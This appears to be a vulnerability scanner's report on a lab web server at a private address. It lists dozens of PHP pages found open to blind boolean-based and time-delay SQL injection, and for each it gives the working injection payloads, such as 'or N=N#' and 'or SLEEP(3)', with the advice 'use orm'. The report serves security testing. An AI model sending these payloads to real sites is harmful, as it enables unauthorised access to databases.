Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	29727=29727
	and	27576=27576
	or	23639=23639#
	and	69201=69202
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'76858'='76858
'/**/and/**/'70340'='70340
'/**/or/**/29908=29908#
'/**/and/**/'92480'='92481
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	29727=29727
	and	27576=27576
	or	23639=23639#
	and	69201=69202
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	29727=29727
	and	27576=27576
	or	23639=23639#
	and	69201=69202
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
81455=81455

and
55655=55655

or
7836=7836#

and
82732=82733
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'26685'='26685
'+and+'95632'='95632
'+or+95663=95663#
'+and+'26359'='26360
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'20355'='20355
'	and	'26406'='26406
'	or	71246=71246#
'	and	'71072'='71073
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---